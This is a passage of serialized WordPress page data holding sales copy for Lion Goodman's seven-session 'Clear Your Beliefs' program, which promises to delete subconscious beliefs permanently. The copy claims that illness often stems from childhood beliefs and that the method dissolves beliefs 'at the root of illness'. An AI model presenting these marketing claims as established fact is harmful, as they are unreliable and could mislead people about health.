aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:61099:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div 